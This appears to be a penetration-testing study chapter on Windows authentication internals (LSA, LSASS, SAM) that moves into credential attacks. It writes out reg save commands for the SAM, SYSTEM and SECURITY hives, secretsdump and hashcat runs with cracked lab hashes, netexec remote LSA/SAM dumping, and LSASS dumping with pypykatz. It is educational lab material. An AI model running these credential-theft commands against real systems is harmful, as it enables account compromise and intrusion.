Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Windows Authentication Process

The Windows client authentication process involves multiple modules responsible for logon, cred retrieval, and verification. There are two authentication protocols available for use within Windows, including NTLM and Kerberos, with Kerberos being the most complex.

LSA (Local Security Authority)

The LSA is the component responsbile for authenticating uses, enforcing security policies, managing logins, and overseeing all aspects of local system security. It also translates usernames to SIDs (Security Identifiers) and manages user sessions.

Windows Authentication Process Diagram

Local interactive logon is handled via the coordination of several components:

  • Winlogon: Manages user logon and logoff processes.
    • Launches LogonUI to prompt for credentials at login
    • Handles password changes
    • Lock and unlock the workstation
    • Winlogon is the only process that accepts login requests from the keyboard, which are sent via RPC messages from Win32k.sys (the kernel-mode Win32 subsystem).
    • After credentials are collected, Winlogon sends them to LSASS for verification.
  • LogonUI: The user interface for logon.
  • GINA (Graphical Identification and Authentication): Provides the user interface for logon
  • SAM: Stores user account information and credentials locally on the machine.
  • LSASS (Local Security Authority Subsystem Service): Responsible for enforcing security policies and managing user authentication.
    • LSASS is comprised of multiple modules and governs all authentication processes.
    • LSASS is located at C:\Windows\System32\lsass.exe and runs as a protected process.
    • Responsible for enforing local security policies, authenticating users, and forwarding security logs to the Even Log.
    • LSASS is essentially the “gatekeeper” of Windows security.
    • After initial login, LSASS will cache credentials in memory, create access tokens, enforce security policies, and manage user sessions.
  • Msv1_0.dll: The NTLM authentication package.

SAM Database

The Security Accounts Manager (SAM) database is a critical component of Windows security that stores user account information and credentials locally on the machine. It is used for local authentication and is accessed by the Local Security Authority Subsystem Service (LSASS) during the authentication process. The SAM database contains hashed passwords, user rights, and group memberships, ensuring that user credentials are securely managed and verified during logon attempts.

SAM is located at C:\Windows\System32\config\SAM and is protected by the operating system to prevent unauthorized access. Direct access to the SAM file is restricted, and it can only be accessed by the system processes, such as LSASS, during authentication.

Note that for workstations joined to Active Directory Domain Services, SAM is not used. Instead, authentication requests are forwarded to domain controllers, which manage user accounts and credentials for the entire domain.

SYSKEY.exe is a utility that provides an additional layer of security for the SAM database by encrypting its contents. This helps protect user credentials from being easily accessed or compromised.

SAM is stored in the registry at HKEY_LOCAL_MACHINE\SAM.

Attacking SAM, SYSTEM, and SECURITY Hives

With administrative access to a Windows system, we can attempt to dump the files associated with the SAM database, copy them to our machine, and use tools like hashcat or John the Ripper to crack the password hashes. Performing this process offline helps avoid detection by not maintaining a persistent session on the target machine.

There are 3 registry hives on the target machine we can copy (if we have admin access):

  • SAM: Contains user account information and password hashes.
  • SYSTEM: Contains system configuration information, including the system key used to encrypt the SAM. This key is required to decrypt the hashes.
  • SECURITY: Contains security policy information and other security-related data.

We can backup these hives using the reg save command in an elevated command prompt:

reg save HKLM\SAM C:\Windows\temp\SAM
reg save HKLM\SYSTEM C:\Windows\temp\SYSTEM
reg save HKLM\SECURITY C:\Windows\temp\SECURITY

If we’re only interested in local user accounts, we technically only need the SAM and SYSTEM hives. However, having the SECURITY hive can be useful for other purposes, such as extracting LSA secrets and cached domain credentials.

We can use Impacket’s secretsdump.py tool to extract the hashes directly from the dumped hives:

rnemeth@htb[/htb]$ python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x4d8c7cff8a543fbf245a363d2ffce518
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:3dd5a5ef0ed25b8d6add8b2805cce06b:::
defaultuser0:1000:aad3b435b51404eeaad3b435b51404ee:683b72db605d064397cf503802b51857:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
sam:1002:aad3b435b51404eeaad3b435b51404ee:6f8c3f4d3869a10f3b4f0522f537fd33:::
rocky:1003:aad3b435b51404eeaad3b435b51404ee:184ecdda8cf1dd238d438c4aea4d560d:::
ITlocal:1004:aad3b435b51404eeaad3b435b51404ee:f7eb9c06fafaa23c4bcf22ba6781c1e2:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xb1e1744d2dc4403f9fb0420d84c3299ba28f0643
dpapi_userkey:0x7995f82c5de363cc012ca6094d381671506fd362
[*] NL$KM 
 0000   D7 0A F4 B9 1E 3E 77 34  94 8F C4 7D AC 8F 60 69   .....>w4...}..`i
 0010   52 E1 2B 74 FF B2 08 5F  59 FE 32 19 D6 A7 2C F8   R.+t..._Y.2...,.
 0020   E2 A4 80 E0 0F 3D F8 48  44 98 87 E1 C9 CD 4B 28   .....=.HD.....K(
 0030   9B 7B 8B BF 3D 59 DB 90  D8 C7 AB 62 93 30 6A 42   .{..=Y.....b.0jB
NL$KM:d70af4b91e3e7734948fc47dac8f606952e12b74ffb2085f59fe3219d6a72cf8e2a480e00f3df848449887e1c9cd4b289b7b8bbf3d59db90d8c7ab6293306a42
[*] Cleaning up...

Notice that secretsdump.py discovered several hashes. Most modern Windows operating systems use NTLMv2 hashes, which are represented by the long strings after the second colon (:). The LM hashes (the shorter strings after the first colon) are often disabled on modern systems for security reasons.

We can copy these hashes into a text file and attempt to crack them using hashcat or John the Ripper. We only want to copy the NTLMv2 hashes for cracking.

rnemeth@htb[/htb]$ sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

hashcat (v6.1.1) starting...

<SNIP>

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

f7eb9c06fafaa23c4bcf22ba6781c1e2:dragon          
6f8c3f4d3869a10f3b4f0522f537fd33:iloveme         
184ecdda8cf1dd238d438c4aea4d560d:adrian          
31d6cfe0d16ae931b73c59d7e0c089c0:                
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: dumpedhashes.txt
Time.Started.....: Tue Dec 14 14:16:56 2021 (0 secs)
Time.Estimated...: Tue Dec 14 14:16:56 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    14284 H/s (0.63ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 5/5 (100.00%) Digests
Progress.........: 8192/14344385 (0.06%)
Rejected.........: 0/8192 (0.00%)
Restore.Point....: 4096/14344385 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: newzealand -> whitetiger

Started: Tue Dec 14 14:16:50 2021
Stopped: Tue Dec 14 14:16:58 2021

Remotely Dumping LSA and SAM Secrets

With access to credentials that have local administrator privileges, it is also possible to target LSA secrets over the network. This may allow us to extract credentials from running services, scheduled tasks, or applications that store passwords using LSA secrets.

rnemeth@htb[/htb]$ netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa

SMB         10.129.42.198   445    WS01     [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:FRONTDESK01) (signing:False) (SMBv1:False)
SMB         10.129.42.198   445    WS01     [+] WS01\bob:HTB_@cademy_stdnt!(Pwn3d!)
SMB         10.129.42.198   445    WS01     [+] Dumping LSA secrets
SMB         10.129.42.198   445    WS01     WS01\worker:Hello123
SMB         10.129.42.198   445    WS01      dpapi_machinekey:0xc03a4a9b2c045e545543f3dcb9c181bb17d6bdce
dpapi_userkey:0x50b9fa0fd79452150111357308748f7ca101944a
SMB         10.129.42.198   445    WS01     NL$KM:e4fe184b25468118bf23f5a32ae836976ba492b3a432deb3911746b8ec63c451a70c1826e9145aa2f3421b98ed0cbd9a0c1a1befacb376c590fa7b56ca1b488b
SMB         10.129.42.198   445    WS01     [+] Dumped 3 LSA secrets to /home/bob/.cme/logs/FRONTDESK01_10.129.42.198_2022-02-07_155623.secrets and /home/bob/.cme/logs/FRONTDESK01_10.129.42.198_2022-02-07_155623.cached

Similarly, we can use netexec to dump hashes from the SAM database remotely.

rnemeth@htb[/htb]$ netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam

SMB         10.129.42.198   445    WS01      [*] Windows 10.0 Build 18362 x64 (name:FRONTDESK01) (domain:WS01) (signing:False) (SMBv1:False)
SMB         10.129.42.198   445    WS01      [+] FRONTDESK01\bob:HTB_@cademy_stdnt! (Pwn3d!)
SMB         10.129.42.198   445    WS01      [+] Dumping SAM hashes
SMB         10.129.42.198   445    WS01      Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.129.42.198   445    WS01     WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:72639bbb94990305b5a015220f8de34e:::
SMB         10.129.42.198   445    WS01     bob:1001:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
SMB         10.129.42.198   445    WS01     sam:1002:aad3b435b51404eeaad3b435b51404ee:a3ecf31e65208382e23b3420a34208fc:::
SMB         10.129.42.198   445    WS01     rocky:1003:aad3b435b51404eeaad3b435b51404ee:c02478537b9727d391bc80011c2e2321:::
SMB         10.129.42.198   445    WS01     worker:1004:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
SMB         10.129.42.198   445    WS01     [+] Added 8 SAM hashes to the database

Credential Manager

Credential Manager is a Windows feature that securely stores and manages user credentials, such as usernames and passwords, for various applications and services. It allows users to save their login information so that they can easily access resources without having to re-enter their credentials each time.

The credentials are encrypted and (by default) stored at: PS C:\Users\[Username]\AppData\Local\Microsoft\[Vault/Credentials]\

NTDS (NT Directory Services)

NTDS is the database that stores Active Directory data, including user accounts, group memberships, and security policies. It is used for authentication and authorization in domain environments.

Attacking LSASS

With administrative privileges on a Windows system, it is possible to dump the contents of the LSASS process memory and use tools like pypykatz or mimikatz to extract plaintext credentials, NTLM hashes, kerberos tickets, and other sensitive information.

We can create the dump using Task Manager on the target, transfer the dump to our machine, and then use pypykatz to analyze it:

$ pypykatz lsa minidump lsass.dmp

pypykatz will parse the dump and extract any credentials it finds, displaying them in a readable format. We can then use hashcat to attempt to crack any NTLM hashes.

References

hettps://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc961760(v=technet.10)?redirectedfrom=MSDN https://learn.microsoft.com/en-us/windows-server/security/windows-authentication/credentials-processes-in-windows-authentication https://www.microsoft.com/en-us/msrc/blog/2014/06/an-overview-of-kb2871997 https://learn.microsoft.com/en-us/windows/win32/secauthn/msv1-0-authentication-package